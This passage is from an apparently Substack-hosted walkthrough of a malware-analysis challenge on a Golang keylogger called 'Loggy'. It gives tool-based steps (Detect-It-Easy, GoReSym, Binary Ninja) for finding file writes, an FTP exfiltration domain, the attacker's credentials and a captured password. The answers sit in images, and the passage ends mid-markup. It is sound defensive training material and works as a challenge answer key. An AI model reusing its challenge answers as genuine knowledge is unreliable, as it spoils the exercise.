20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>5. Which function call suggests that the malware produces a file after execution?</strong></p><ul><li><p><strong>Solution</strong>: Use <strong>Detect-It-Easy</strong> to search for the term "file" in the strings. Examine the context and identify the function responsible for writing to a file.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!fhsP!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fadad05da-ec4f-4ad4-aa59-f57e4bc69e5f_792x623.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!fhsP!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fadad05da-ec4f-4ad4-aa59-f57e4bc69e5f_792x623.png 424w, https://substackcdn.com/image/fetch/$s_!fhsP!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fadad05da-ec4f-4ad4-aa59-f57e4bc69e5f_792x623.png 848w, https://substackcdn.com/image/fetch/$s_!fhsP!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fadad05da-ec4f-4ad4-aa59-f57e4bc69e5f_792x623.png 1272w, https://substackcdn.com/image/fetch/$s_!fhsP!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fadad05da-ec4f-4ad4-aa59-f57e4bc69e5f_792x623.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!fhsP!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fadad05da-ec4f-4ad4-aa59-f57e4bc69e5f_792x623.png" width="792" height="623" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/adad05da-ec4f-4ad4-aa59-f57e4bc69e5f_792x623.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:623,&quot;width&quot;:792,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!fhsP!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fadad05da-ec4f-4ad4-aa59-f57e4bc69e5f_792x623.png 424w, https://substackcdn.com/image/fetch/$s_!fhsP!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fadad05da-ec4f-4ad4-aa59-f57e4bc69e5f_792x623.png 848w, https://substackcdn.com/image/fetch/$s_!fhsP!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fadad05da-ec4f-4ad4-aa59-f57e4bc69e5f_792x623.png 1272w, https://substackcdn.com/image/fetch/$s_!fhsP!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fadad05da-ec4f-4ad4-aa59-f57e4bc69e5f_792x623.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>6. You observe that the malware is exfiltrating data over FTP. What is the domain it is exfiltrating data to?</strong></p><ul><li><p><strong>Approach</strong>:</p><ol><li><p>Identify the binary as a <strong>Golang</strong> binary.</p></li><li><p>Install the <strong>GoReSym</strong> plugin for Binary Ninja to better analyze Golang binaries.</p></li><li><p>Generate the necessary .json file using the command: <br>GoReSym.exe -t -d -p Loggy.exe &gt; Loggy.json</p></li><li><p>Load the binary into Binary Ninja, apply the <strong>GoReSym Info</strong>, and locate the main.SendFilesViaFTP function. Identify the FTP domain used for exfiltration.</p></li></ol></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!lcI-!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0a186ee4-12d6-4289-9cb3-4981394a5383_1025x443.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!lcI-!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0a186ee4-12d6-4289-9cb3-4981394a5383_1025x443.png 424w, https://substackcdn.com/image/fetch/$s_!lcI-!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0a186ee4-12d6-4289-9cb3-4981394a5383_1025x443.png 848w, https://substackcdn.com/image/fetch/$s_!lcI-!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0a186ee4-12d6-4289-9cb3-4981394a5383_1025x443.png 1272w, https://substackcdn.com/image/fetch/$s_!lcI-!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0a186ee4-12d6-4289-9cb3-4981394a5383_1025x443.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!lcI-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0a186ee4-12d6-4289-9cb3-4981394a5383_1025x443.png" width="1025" height="443" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/0a186ee4-12d6-4289-9cb3-4981394a5383_1025x443.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:443,&quot;width&quot;:1025,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:45334,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!lcI-!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0a186ee4-12d6-4289-9cb3-4981394a5383_1025x443.png 424w, https://substackcdn.com/image/fetch/$s_!lcI-!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0a186ee4-12d6-4289-9cb3-4981394a5383_1025x443.png 848w, https://substackcdn.com/image/fetch/$s_!lcI-!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0a186ee4-12d6-4289-9cb3-4981394a5383_1025x443.png 1272w, https://substackcdn.com/image/fetch/$s_!lcI-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0a186ee4-12d6-4289-9cb3-4981394a5383_1025x443.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!6C2y!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff0452896-99a1-4050-ad29-45ee91693037_2069x580.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!6C2y!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff0452896-99a1-4050-ad29-45ee91693037_2069x580.png 424w, https://substackcdn.com/image/fetch/$s_!6C2y!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff0452896-99a1-4050-ad29-45ee91693037_2069x580.png 848w, https://substackcdn.com/image/fetch/$s_!6C2y!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff0452896-99a1-4050-ad29-45ee91693037_2069x580.png 1272w, https://substackcdn.com/image/fetch/$s_!6C2y!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff0452896-99a1-4050-ad29-45ee91693037_2069x580.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!6C2y!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff0452896-99a1-4050-ad29-45ee91693037_2069x580.png" width="1456" height="408" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f0452896-99a1-4050-ad29-45ee91693037_2069x580.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:408,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!6C2y!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff0452896-99a1-4050-ad29-45ee91693037_2069x580.png 424w, https://substackcdn.com/image/fetch/$s_!6C2y!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff0452896-99a1-4050-ad29-45ee91693037_2069x580.png 848w, https://substackcdn.com/image/fetch/$s_!6C2y!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff0452896-99a1-4050-ad29-45ee91693037_2069x580.png 1272w, https://substackcdn.com/image/fetch/$s_!6C2y!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff0452896-99a1-4050-ad29-45ee91693037_2069x580.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>7. What are the threat actor&#8217;s credentials?</strong></p><ul><li><p><strong>Solution</strong>: Within the main.SendFilesViaFTP function, observe text data being loaded into registers. Extract the username and password.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!KQ3x!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F508f40be-6e81-49e1-9fc2-8909ac45e380_863x163.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!KQ3x!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F508f40be-6e81-49e1-9fc2-8909ac45e380_863x163.png 424w, https://substackcdn.com/image/fetch/$s_!KQ3x!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F508f40be-6e81-49e1-9fc2-8909ac45e380_863x163.png 848w, https://substackcdn.com/image/fetch/$s_!KQ3x!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F508f40be-6e81-49e1-9fc2-8909ac45e380_863x163.png 1272w, https://substackcdn.com/image/fetch/$s_!KQ3x!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F508f40be-6e81-49e1-9fc2-8909ac45e380_863x163.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!KQ3x!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F508f40be-6e81-49e1-9fc2-8909ac45e380_863x163.png" width="863" height="163" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/508f40be-6e81-49e1-9fc2-8909ac45e380_863x163.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:163,&quot;width&quot;:863,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!KQ3x!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F508f40be-6e81-49e1-9fc2-8909ac45e380_863x163.png 424w, https://substackcdn.com/image/fetch/$s_!KQ3x!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F508f40be-6e81-49e1-9fc2-8909ac45e380_863x163.png 848w, https://substackcdn.com/image/fetch/$s_!KQ3x!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F508f40be-6e81-49e1-9fc2-8909ac45e380_863x163.png 1272w, https://substackcdn.com/image/fetch/$s_!KQ3x!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F508f40be-6e81-49e1-9fc2-8909ac45e380_863x163.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>8. What file keeps getting written to disk?</strong></p><ul><li><p><strong>Solution</strong>: In the same function, look for a specific file write operation. The file name should be apparent within the function's logic or strings.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!hmNC!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e8132ed-29bd-48dc-952a-3832ffe0c98c_1054x443.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!hmNC!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e8132ed-29bd-48dc-952a-3832ffe0c98c_1054x443.png 424w, https://substackcdn.com/image/fetch/$s_!hmNC!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e8132ed-29bd-48dc-952a-3832ffe0c98c_1054x443.png 848w, https://substackcdn.com/image/fetch/$s_!hmNC!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e8132ed-29bd-48dc-952a-3832ffe0c98c_1054x443.png 1272w, https://substackcdn.com/image/fetch/$s_!hmNC!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e8132ed-29bd-48dc-952a-3832ffe0c98c_1054x443.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!hmNC!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e8132ed-29bd-48dc-952a-3832ffe0c98c_1054x443.png" width="1054" height="443" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/5e8132ed-29bd-48dc-952a-3832ffe0c98c_1054x443.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:443,&quot;width&quot;:1054,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!hmNC!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e8132ed-29bd-48dc-952a-3832ffe0c98c_1054x443.png 424w, https://substackcdn.com/image/fetch/$s_!hmNC!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e8132ed-29bd-48dc-952a-3832ffe0c98c_1054x443.png 848w, https://substackcdn.com/image/fetch/$s_!hmNC!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e8132ed-29bd-48dc-952a-3832ffe0c98c_1054x443.png 1272w, https://substackcdn.com/image/fetch/$s_!hmNC!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e8132ed-29bd-48dc-952a-3832ffe0c98c_1054x443.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>9. When Janice changed her password, this was captured in a file. What is Janice's username and password?</strong></p><ul><li><p><strong>Solution</strong>: Extract and review the keylog.txt file provided in the zip archive. The captured credentials will include Janice's username and password.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!tdxI!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe2a88a29-fc17-4d09-8a1a-8ee26aae4bcb_1207x259.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!tdxI!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe2a88a29-fc17-4d09-8a1a-8ee26aae4bcb_1207x259.png 424w, https://substackcdn.com/image/fetch/$s_!tdxI!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe2a88a29-fc17-4d09-8a1a-8ee26aae4bcb_1207x259.png 848w, https://substackcdn.com/image/fetch/$s_!tdxI!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe2a88a29-fc17-4d09-8a1a-8ee26aae4bcb_1207x259.png 1272w, https://substackcdn.com/image/fetch/$s_!tdxI!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe2a88a29-fc17-4d09-8a1a-8ee26aae4bcb_1207x259.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!tdxI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe2a88a29-fc17-4d09-8a1a-8ee26aae4bcb_1207x259.png" width="1207" height="259" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e2a88a29-fc17-4d09-8a1a-8ee26aae4bcb_1207x259.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:259,&quot;width&quot;:1207,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!tdxI!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe2a88a29-fc17-4d09-8a1a-8ee26aae4bcb_1207x259.png 424w, https://substackcdn.com/image/fetch/$s_!tdxI!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe2a88a29-fc17-4d09-8a1a-8ee26aae4bcb_1207x259.png 848w, 